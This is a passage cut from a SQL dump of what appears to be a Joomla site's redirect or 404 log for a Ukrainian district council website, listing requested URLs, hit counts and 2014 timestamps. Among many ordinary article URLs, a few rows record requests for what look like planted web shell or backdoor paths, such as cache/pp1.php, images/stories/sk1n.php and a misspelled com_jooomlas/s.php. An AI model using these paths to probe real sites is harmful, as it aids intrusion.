02:18:55','0000-00-00 00:00:00',301),(4912,'http://malyn-rayrada.org.ua/components/com_jooomlas/s.php','','','',1,0,'2014-09-26 02:18:56','0000-00-00 00:00:00',301),(4913,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15&lang=en&Itemid=','','','',4,0,'2014-09-26 02:32:21','0000-00-00 00:00:00',301),(4914,'http://www.malyn-rayrada.org.ua/modules/mod_fpss/mod_fpss/templates/TT/template_css.php?w=820&h=170&sw=200','','http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=28:--22102010-&layout=blog&Itemid=59&lang=ru&limitstart=5','',4,0,'2014-09-26 02:32:59','0000-00-00 00:00:00',301),(4915,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22----&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',1,0,'2014-09-26 02:45:24','0000-00-00 00:00:00',301),(4916,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22----&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',1,0,'2014-09-26 02:53:40','0000-00-00 00:00:00',301),(4917,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1237:-200-&tmpl=component&print=1&layout=default&page=&lang=uk','','','',3,0,'2014-09-26 04:06:41','0000-00-00 00:00:00',301),(4918,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11&lang=uk','','','',6,0,'2014-09-26 04:23:53','0000-00-00 00:00:00',301),(4919,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',10,0,'2014-09-26 04:37:11','0000-00-00 00:00:00',301),(4920,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11&lang=uk','','','',7,0,'2014-09-26 04:40:57','0000-00-00 00:00:00',301),(4921,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1350:2014-06-23-07-06-24&catid=59:--20062014-&Itemid=107&lang=ru','','','',5,0,'2014-09-26 04:46:15','0000-00-00 00:00:00',301),(4922,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1262:2014-03-31-11-36-45&catid=10&Itemid=17&lang=en','','','',6,0,'2014-09-26 04:47:35','0000-00-00 00:00:00',301),(4923,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11&lang=uk','','','',8,0,'2014-09-26 04:47:46','0000-00-00 00:00:00',301),(4924,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1379:2014-09-01-08-47-25&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-09-26 04:48:31','0000-00-00 00:00:00',301),(4925,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-09-26 04:52:18','0000-00-00 00:00:00',301),(4926,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1360:-qq&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-09-26 04:55:08','0000-00-00 00:00:00',301),(4927,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1360:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-09-26 04:55:14','0000-00-00 00:00:00',301),(4928,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&lang=uk','','','',9,0,'2014-09-26 04:59:53','0000-00-00 00:00:00',301),(4929,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11&lang=ru','','','',7,0,'2014-09-26 05:00:38','0000-00-00 00:00:00',301),(4930,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11&Itemid=14&lang=en','','','',6,0,'2014-09-26 05:05:55','0000-00-00 00:00:00',301),(4931,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',13,0,'2014-09-26 05:09:43','0000-00-00 00:00:00',301),(4932,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1194:-2012-2015-&catid=56:--03022014-&Itemid=97&lang=uk','','','',9,0,'2014-09-26 05:15:00','0000-00-00 00:00:00',301),(4933,'http://malyn-rayrada.org.ua/plugins/editors-xtd/mosimage.php','','','',1,0,'2014-09-26 05:15:19','0000-00-00 00:00:00',301),(4934,'http://malyn-rayrada.org.ua/cache/pp1.php','','','',1,0,'2014-09-26 05:15:19','0000-00-00 00:00:00',301),(4935,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11&lang=uk','','','',8,0,'2014-09-26 05:21:03','0000-00-00 00:00:00',301),(4936,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11&lang=uk','','','',7,0,'2014-09-26 05:27:07','0000-00-00 00:00:00',301),(4937,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11&Itemid=14&lang=en','','','',2,0,'2014-09-26 05:28:24','0000-00-00 00:00:00',301),(4938,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-09-26 05:28:30','0000-00-00 00:00:00',301),(4939,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-09-26 05:28:33','0000-00-00 00:00:00',301),(4940,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-09-26 05:28:35','0000-00-00 00:00:00',301),(4941,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-09-26 05:28:38','0000-00-00 00:00:00',301),(4942,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11&lang=ru','','','',8,0,'2014-09-26 05:34:41','0000-00-00 00:00:00',301),(4943,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1299:-lr-&catid=58:--30042014-&Itemid=105&lang=uk','','','',15,0,'2014-09-26 05:36:15','0000-00-00 00:00:00',301),(4944,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-26 05:38:30','0000-00-00 00:00:00',301),(4945,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11&lang=uk','','','',8,0,'2014-09-26 05:39:59','0000-00-00 00:00:00',301),(4946,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&Itemid=14&lang=en','','','',12,0,'2014-09-26 05:41:29','0000-00-00 00:00:00',301),(4947,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11&lang=en&Itemid=','','','',8,0,'2014-09-26 05:47:34','0000-00-00 00:00:00',301),(4948,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11&lang=uk','','','',6,0,'2014-09-26 05:49:05','0000-00-00 00:00:00',301),(4949,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11&lang=en&Itemid=','','','',7,0,'2014-09-26 05:49:50','0000-00-00 00:00:00',301),(4950,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1350:2014-06-23-07-06-24&catid=59&Itemid=107&lang=uk','','','',4,0,'2014-09-26 05:52:05','0000-00-00 00:00:00',301),(4951,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=929:2013-02-21-09-11-26&catid=47:--21022013-&Itemid=86&lang=en','','','',4,0,'2014-09-26 05:54:27','0000-00-00 00:00:00',301),(4952,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&lang=en','','','',6,0,'2014-09-26 05:56:24','0000-00-00 00:00:00',301),(4953,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11&lang=ru','','','',5,0,'2014-09-26 06:00:25','0000-00-00 00:00:00',301),(4954,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2014-01-06-08-19-15&catid=11&lang=uk','','','',5,0,'2014-09-26 06:01:56','0000-00-00 00:00:00',301),(4955,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1187:2014-01-28-09-43-51&catid=56&Itemid=97&lang=en','','','',6,0,'2014-09-26 06:06:28','0000-00-00 00:00:00',301),(4956,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11&lang=en&Itemid=','','','',8,0,'2014-09-26 06:11:01','0000-00-00 00:00:00',301),(4957,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&lang=en','','','',5,0,'2014-09-26 06:17:49','0000-00-00 00:00:00',301),(4958,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11&lang=uk','','','',8,0,'2014-09-26 06:20:52','0000-00-00 00:00:00',301),(4959,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-26 06:25:24','0000-00-00 00:00:00',301),(4960,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1379:2014-09-01-08-47-25&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-26 06:26:12','0000-00-00 00:00:00',301),(4961,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1249:2014-03-24-06-41-46&catid=57&Itemid=98&lang=en','','','',8,0,'2014-09-26 06:26:55','0000-00-00 00:00:00',301),(4962,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',12,0,'2014-09-26 06:28:26','0000-00-00 00:00:00',301),(4963,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:-2013-&catid=11&lang=ru&Itemid=','','','',5,0,'2014-09-26 06:32:59','0000-00-00 00:00:00',301),(4964,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&lang=uk','','','',6,0,'2014-09-26 06:39:01','0000-00-00 00:00:00',301),(4965,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11&lang=en','','','',8,0,'2014-09-26 06:42:04','0000-00-00 00:00:00',301),(4966,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&lang=en','','','',7,0,'2014-09-26 06:44:39','0000-00-00 00:00:00',301),(4967,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1288:2014-04-23-06-50-40&catid=10&Itemid=17&lang=uk','','','',7,0,'2014-09-26 06:48:35','0000-00-00 00:00:00',301),(4968,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11&lang=uk','','','',7,0,'2014-09-26 06:52:39','0000-00-00 00:00:00',301),(4969,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11&lang=uk','','','',9,0,'2014-09-26 06:53:29','0000-00-00 00:00:00',301),(4970,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11&lang=en','','','',9,0,'2014-09-26 06:56:28','0000-00-00 00:00:00',301),(4971,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1261:2014-03-31-11-35-31&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',7,0,'2014-09-26 07:05:35','0000-00-00 00:00:00',301),(4972,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1309:-2014-&catid=58:--30042014-&Itemid=105&lang=uk','','','',17,0,'2014-09-26 07:09:18','0000-00-00 00:00:00',301),(4973,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11&lang=en','','','',8,0,'2014-09-26 07:15:23','0000-00-00 00:00:00',301),(4974,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11&lang=uk','','','',7,0,'2014-09-26 07:16:04','0000-00-00 00:00:00',301),(4975,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11&lang=en&Itemid=','','','',9,0,'2014-09-26 07:30:06','0000-00-00 00:00:00',301),(4976,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11&lang=ru','','','',6,0,'2014-09-26 07:35:02','0000-00-00 00:00:00',301),(4977,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1306:2014-04-30-09-40-02&catid=58:--30042014-&Itemid=105&lang=uk','','','',24,0,'2014-09-26 07:36:33','0000-00-00 00:00:00',301),(4978,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11&lang=uk','','','',2,0,'2014-09-26 07:40:04','0000-00-00 00:00:00',301),(4979,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11&lang=uk','','','',6,0,'2014-09-26 07:47:54','0000-00-00 00:00:00',301),(4980,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-26 07:49:36','0000-00-00 00:00:00',301),(4981,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11&lang=ru','','','',4,0,'2014-09-26 07:51:37','0000-00-00 00:00:00',301),(4982,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11&lang=uk','','','',9,0,'2014-09-26 07:51:42','0000-00-00 00:00:00',301),(4983,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1078:-2007-2015-&catid=53:--25102013-&Itemid=94&lang=en','','','',1,0,'2014-09-26 07:55:22','0000-00-00 00:00:00',301),(4984,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1080:-l-r&catid=53:--25102013-&Itemid=94&lang=ru','','','',6,0,'2014-09-26 07:55:41','0000-00-00 00:00:00',301),(4985,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1080:-l-r&catid=53:--25102013-&Itemid=94&lang=uk','','','',7,0,'2014-09-26 07:55:44','0000-00-00 00:00:00',301),(4986,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1081:-2013-2017-&catid=53:--25102013-&Itemid=94&lang=ru','','','',1,0,'2014-09-26 07:55:55','0000-00-00 00:00:00',301),(4987,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1085:2013-09-11-12-15-54&catid=53:--25102013-&Itemid=94&lang=en','','','',3,0,'2014-09-26 07:56:19','0000-00-00 00:00:00',301),(4988,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1096:2013-09-24-13-34-16&catid=53:--25102013-&Itemid=94&lang=uk','','','',3,0,'2014-09-26 07:57:42','0000-00-00 00:00:00',301),(4989,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1099:-l-r&catid=53:--25102013-&Itemid=94&lang=en','','','',1,0,'2014-09-26 07:57:56','0000-00-00 00:00:00',301),(4990,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1113:2013-10-23-09-26-07&catid=53:--25102013-&Itemid=94&lang=en','','','',1,0,'2014-09-26 07:58:57','0000-00-00 00:00:00',301),(4991,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11&lang=ru','','','',8,0,'2014-09-26 08:03:02','0000-00-00 00:00:00',301),(4992,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-26 08:06:04','0000-00-00 00:00:00',301),(4993,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=915:-14-2012-340-l-2012-2013-&catid=47&Itemid=86&lang=ru','','','',1,0,'2014-09-26 08:06:11','0000-00-00 00:00:00',301),(4994,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-26 08:08:03','0000-00-00 00:00:00',301),(4995,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11&lang=en','','','',2,0,'2014-09-26 08:09:04','0000-00-00 00:00:00',301),(4996,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-26 08:10:00','0000-00-00 00:00:00',301),(4997,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=32&lang=uk&limitstart=20','','','',9,0,'2014-09-26 08:10:36','0000-00-00 00:00:00',301),(4998,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=895:-2013-2017-&catid=36&Itemid=70&lang=en','','','',4,0,'2014-09-26 08:11:22','0000-00-00 00:00:00',301),(4999,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11&lang=en&Itemid=','','','',9,0,'2014-09-26 08:18:10','0000-00-00 00:00:00',301),(5000,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-26 08:18:42','0000-00-00 00:00:00',301),(5001,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11&lang=uk','','','',7,0,'2014-09-26 08:28:46','0000-00-00 00:00:00',301),(5002,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1135:2013-11-15-07-00-15&catid=54&Itemid=95&lang=en','','','',4,0,'2014-09-26 08:29:19','0000-00-00 00:00:00',301),(5003,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11&lang=uk','','','',8,0,'2014-09-26 08:34:04','0000-00-00 00:00:00',301),(5004,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-26 08:36:45','0000-00-00 00:00:00',301),(5005,'http://www.malyn-rayrada.org.ua/index.php?option=com_poll&id=10:2013-02-22-07-29-10&lang=ru','','','',6,0,'2014-09-26 08:37:06','0000-00-00 00:00:00',301),(5006,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11&lang=en&Itemid=0','','','',4,0,'2014-09-26 08:37:48','0000-00-00 00:00:00',301),(5007,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-26 08:37:51','0000-00-00 00:00:00',301),(5008,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11&lang=uk','','','',9,0,'2014-09-26 08:39:22','0000-00-00 00:00:00',301),(5009,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-26 08:40:58','0000-00-00 00:00:00',301),(5010,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11&lang=uk&Itemid=','','','',6,0,'2014-09-26 08:43:16','0000-00-00 00:00:00',301),(5011,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&lang=uk','','','',5,0,'2014-09-26 08:44:41','0000-00-00 00:00:00',301),(5012,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-26 08:45:23','0000-00-00 00:00:00',301),(5013,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11&lang=en','','','',9,0,'2014-09-26 08:47:42','0000-00-00 00:00:00',301),(5014,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11&lang=ru','','','',5,0,'2014-09-26 08:50:43','0000-00-00 00:00:00',301),(5015,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11&lang=uk','','','',8,0,'2014-09-26 08:57:33','0000-00-00 00:00:00',301),(5016,'http://www.malyn-rayrada.org.ua/index.php?view=category&id=5:2010-06-05-12-51-34&option=com_content&Itemid=18&lang=en','','','',8,0,'2014-09-26 08:58:18','0000-00-00 00:00:00',301),(5017,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15&lang=en','','','',8,0,'2014-09-26 08:59:04','0000-00-00 00:00:00',301),(5018,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11&lang=ru','','','',7,0,'2014-09-26 08:59:52','0000-00-00 00:00:00',301),(5019,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11&lang=en&Itemid=0','','','',7,0,'2014-09-26 09:04:21','0000-00-00 00:00:00',301),(5020,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-09-26 09:05:06','0000-00-00 00:00:00',301),(5021,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1255:2014-03-27-06-02-11&catid=10&Itemid=17&lang=ru','','','',8,0,'2014-09-26 09:11:10','0000-00-00 00:00:00',301),(5022,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1246:-2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',5,0,'2014-09-26 09:13:26','0000-00-00 00:00:00',301),(5023,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-26 09:14:10','0000-00-00 00:00:00',301),(5024,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11&lang=ru&Itemid=0','','','',5,0,'2014-09-26 09:15:42','0000-00-00 00:00:00',301),(5025,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11&lang=ru','','','',5,0,'2014-09-26 09:17:59','0000-00-00 00:00:00',301),(5026,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11&lang=en','','','',9,0,'2014-09-26 09:21:01','0000-00-00 00:00:00',301),(5027,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11&lang=ru&Itemid=','','','',5,0,'2014-09-26 09:23:18','0000-00-00 00:00:00',301),(5028,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&lang=ru','','','',8,0,'2014-09-26 09:24:47','0000-00-00 00:00:00',301),(5029,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11&lang=en&Itemid=0','','','',7,0,'2014-09-26 09:26:18','0000-00-00 00:00:00',301),(5030,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11&lang=en','','','',7,0,'2014-09-26 09:28:34','0000-00-00 00:00:00',301),(5031,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-26 09:36:34','0000-00-00 00:00:00',301),(5032,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1306:2014-04-30-09-40-02&catid=58:--30042014-&Itemid=105&lang=en','','','',9,0,'2014-09-26 09:39:55','0000-00-00 00:00:00',301),(5033,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',18,0,'2014-09-26 09:41:04','0000-00-00 00:00:00',301),(5034,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11&Itemid=14&lang=en','','','',23,0,'2014-09-26 09:46:19','0000-00-00 00:00:00',301),(5035,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1336:2014-06-10-11-01-06&catid=59:--20062014-&Itemid=107&lang=en','','','',8,0,'2014-09-26 09:46:24','0000-00-00 00:00:00',301),(5036,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11&lang=en','','','',5,0,'2014-09-26 09:49:01','0000-00-00 00:00:00',301),(5037,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1336:2014-06-10-11-01-06&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',2,0,'2014-09-26 09:49:39','0000-00-00 00:00:00',301),(5038,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11&lang=en&Itemid=','','','',9,0,'2014-09-26 09:53:34','0000-00-00 00:00:00',301),(5039,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1304:2014-04-30-09-11-23&catid=58:--30042014-&Itemid=105&lang=en','','','',10,0,'2014-09-26 09:54:18','0000-00-00 00:00:00',301),(5040,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1336:2014-06-10-11-01-06&catid=36&Itemid=70&lang=en','','','',1,0,'2014-09-26 10:06:03','0000-00-00 00:00:00',301),(5041,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1336:2014-06-10-11-01-06&catid=59&Itemid=107&lang=en','','','',2,0,'2014-09-26 10:07:03','0000-00-00 00:00:00',301),(5042,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11&Itemid=14&lang=en','','','',14,0,'2014-09-26 10:09:21','0000-00-00 00:00:00',301),(5043,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=915:-14-2012-340-l-2012-2013-&catid=47&Itemid=86&lang=uk','','','',8,0,'2014-09-26 10:14:26','0000-00-00 00:00:00',301),(5044,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-26 10:15:15','0000-00-00 00:00:00',301),(5045,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11&lang=ru','','','',7,0,'2014-09-26 10:15:46','0000-00-00 00:00:00',301),(5046,'http://www.malyn-rayrada.org.ua/images/stories/sk1n.php?rf','','','',1,0,'2014-09-26 10:16:45','0000-00-00 00:00:00',301),(5047,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1242:-25-2011-74-19-2011-193-&catid=57&Itemid=98&lang=uk','','','',10,0,'2014-09-26 10:25:01','0000-00-00 00:00:00',301),(5048,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1350:2014-06-23-07-06-24&catid=59&Itemid=107&lang=en','','','',5,0,'2014-09-26 10:26:26','0000-00-00 00:00:00',301),(5049,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11&lang=en&Itemid=','','','',8,0,'2014-09-26 10:27:52','0000-00-00 00:00:00',301),(5050,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&lang=en&Itemid=','','','',6,0,'2014-09-26 10:29:17','0000-00-00 00:00:00',301),(5051,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1202:2014-01-31-07-45-54&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',11,0,'2014-09-26 10:32:08','0000-00-00 00:00:00',301),(5052,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1262:2014-03-31-11-36-45&catid=10&Itemid=17&lang=uk','','','',19,0,'2014-09-26 10:33:33','0000-00-00 